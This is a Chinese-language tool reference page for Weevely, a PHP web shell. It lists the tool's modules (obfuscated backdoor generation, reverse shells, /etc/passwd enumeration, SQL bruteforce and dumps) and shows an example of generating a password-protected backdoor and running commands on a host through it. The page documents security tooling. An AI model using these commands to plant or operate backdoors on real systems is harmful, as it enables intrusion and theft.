Weevely包装说明
Weevely是一个隐形的PHP网页外壳,模拟的telnet类似的连接。它是Web应用程序开发后的一个重要工具,并且可以用作隐形后门或作为网络的外壳,以管理合法的网络账户,甚至免费托管的。 资料来源:https://github.com/epinna/Weevely/
- 作者:Weevely开发商
许可:GPL第二版
0x01 包含在weevely包工具
weevely - 隐形的小网站壳
:~# weevely help +--------------------+------------------------------------------------------+ | generator | description | +--------------------+------------------------------------------------------+ | :generate.img | Backdoor existing image and create related .htaccess | | :generate.htaccess | Generate backdoored .htaccess | | :generate.php | Generate obfuscated PHP backdoor | +--------------------+------------------------------------------------------+ +----------------------+------------------------------------------------------------------------------+ | module | description | +----------------------+------------------------------------------------------------------------------+ | :audit.systemfiles | Find wrong system files permissions | | :audit.userfiles | Guess files with wrong permissions in users home folders | | :audit.mapwebfiles | Crawl and enumerate web folders files permissions | | :audit.phpconf | Check php security configurations | | :audit.etcpasswd | Enumerate users and /etc/passwd content | | :shell.sh | Execute system shell command | | :shell.php | Execute PHP statement | | :system.info | Collect system informations | | :find.name | Find files with matching name | | :find.perms | Find files with write, read, execute permissions | | :find.suidsgid | Find files with superuser flags | | :backdoor.reversetcp | Send reverse TCP shell | | :backdoor.tcp | Open a shell on TCP port | | :bruteforce.sql | Bruteforce SQL username | | :bruteforce.sqlusers | Bruteforce all SQL users | | :file.read | Read remote file | | :file.webdownload | Download web URL to remote filesystem | | :file.mount | Mount remote filesystem using HTTPfs | | :file.enum | Enumerate remote paths | | :file.upload2web | Upload binary/ascii file into remote web folders and guess corresponding url | | :file.check | Check remote files type, md5 and permission | | :file.rm | Remove remote files and folders | | :file.ls | List directory contents | | :file.touch | Change file timestamps | | :file.download | Download binary/ascii files from the remote filesystem | | :file.upload | Upload binary/ascii file into remote filesystem | | :file.edit | Edit remote file | | :sql.console | Run SQL console or execute single queries | | :sql.dump | Get SQL database dump | | :net.ifaces | Print interfaces addresses | | :net.proxy | Install and run Proxy to tunnel traffic through target | | :net.phpproxy | Install remote PHP proxy | | :net.scan | Port scan open TCP ports | +----------------------+------------------------------------------------------------------------------+ Hint: Run ':help <module>' to print detailed usage informations.0x02 weevely用法示例
生成一个PHP后门 (产生) 与给定的密码 (s3cr3t) 的保护。
:~# weevely generate s3cr3t [generate.php] Backdoor file 'weevely.php' created with password 's3cr3t':~# weevely http://192.168.1.202/weevely.php s3cr3t ________ __ | | | |----.----.-.--.----' |--.--. | | | | -__| -__| | | -__| | | | |________|____|____|___/|____|__|___ | v1.1 |_____| Stealth tiny web shell [+] Browse filesystem, execute commands or list available modules with ':help' [+] Current session: 'sessions/192.168.1.202/weevely.session' :/var/www $ uname Linux :/var/www $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
原文来自:https://www.hackfun.org/kali-tools/weevely_zh.html。转载请注明原出处,商用请联系原作者授权。